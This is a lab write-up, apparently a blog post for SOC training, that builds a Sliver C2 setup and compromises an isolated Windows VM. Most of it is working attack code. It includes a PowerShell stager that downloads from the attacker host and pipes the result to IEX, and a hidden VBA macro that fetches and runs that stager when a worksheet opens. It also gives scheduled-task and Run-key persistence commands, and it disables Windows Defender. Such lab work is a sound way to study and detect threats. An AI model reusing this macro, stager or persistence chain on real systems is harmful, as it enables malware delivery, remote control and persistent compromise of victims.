As part of my SOC documentation development, I set up a Digital Forensics and Incident Response (DFIR) simulation using a Windows VM and a Kali Linux VM, both hosted locally. My goal was to simulate a realistic cyber attack scenario where a malicious Office document triggers a PowerShell script that downloads a beacon from my Kali VM, saves it to the temporary folder, and establishes Command and Control (C2) traffic. I chose Sliver as my C2 framework for this simulation. This writeup details the steps I took to set up the C2 infrastructure and deploy the implant—a first stepping stone toward further DFIR simulations.
Sliver is an open-source C2 framework written in Go, and I chose it for its simplicity and one-liner installation process.
-
Installation:
Copy, paste, and execute the following command:curl https://sliver.sh/install | sudo bash -
Launching the Framework:
Start Sliver by running:sliver
This command opens an interactive shell for configuring listeners, managing implants, and more.
To catch connections from the implant, I set up an HTTP listener that mimics common attack techniques.
- Create the Listener:
Inside the Sliver client shell, run:http
A stager is a small script that downloads and runs the full implant on the target. For my Windows VM target, I opted for a PowerShell stager.
Generate the stager with this command:
(New-Object System.Net.WebClient).DownloadString('http://192.168.1.XX:8000/Stage.ps1') | IEXTo deliver the implant, I crafted a malicious Excel document with a VBA macro that downloads and executes the stager.
- Open Excel on your Windows VM and access the VBA editor via Developer > Visual Basic.
- Add a new module and insert the following VBA code:
This macro downloads the stager to the temporary folder and runs it silently when the worksheet is activated.
Private Sub Worksheet_Activate() Dim strCommand As String strCommand = "$url = 'http://192.168.1.XX/stager.ps1'; $outputPath = '$env:TEMP\stager.ps1'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); & PowerShell -ExecutionPolicy Bypass -File $outputPath" Shell "PowerShell -ExecutionPolicy Bypass -Command """ & strCommand & """", vbHide End Sub
- Save the document as a macro-enabled file named
malicious.xlsm.
With the malicious document ready, I deployed it on the Windows VM to test the C2 connection.
- Move
malicious.xlsmto the Windows VM using a shared folder. - Open the file and enable macros when prompted.
- The macro downloads and executes
stager.ps1, which connects back to the Sliver listener. - In the Sliver client on Kali, a new session appears—confirming that the Windows VM is now a beacon under control.
- Interact with the session by running commands such as:
These commands confirm connectivity and allow further interaction with the target.
sessions -i XXXX whoami execute schtasks /create /tn "MyStartupTask" /tr "C:\Users\admin\Downloads\UNLIKELY_DUNGAREES.exe" /sc onstart /f execute reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "MyMaliciousApp" /t REG_SZ /d "C:\Users\admin\Downloads\UNLIKELY_DUNGAREES.exe" /f
- Network Setup: Both VMs were maintained on an isolated Host-Only network in VirtualBox to prevent external interference.
- Defenses: Windows Defender was temporarily disabled on the Windows VM to ensure the implant would run.
- Monitoring: I used TCP View on the victim VM to analyze the connection.
- Persistence: Commands were executed from the C2 to create a scheduled task and add a registry Run key for persistence.
This simulation was a success. I set up a Sliver C2 server, hosted a stager, and deployed an implant on a Windows VM using a malicious Excel document. The HTTP listener successfully detected the connection, establishing a working beacon and mimicking real-world C2 traffic. This hands-on exercise provided invaluable practical experience in setting up and detecting advanced threats—a critical skill for SOC training. Moving forward, I plan to explore additional persistence mechanisms and experiment with different payloads with anti-analysis tactics.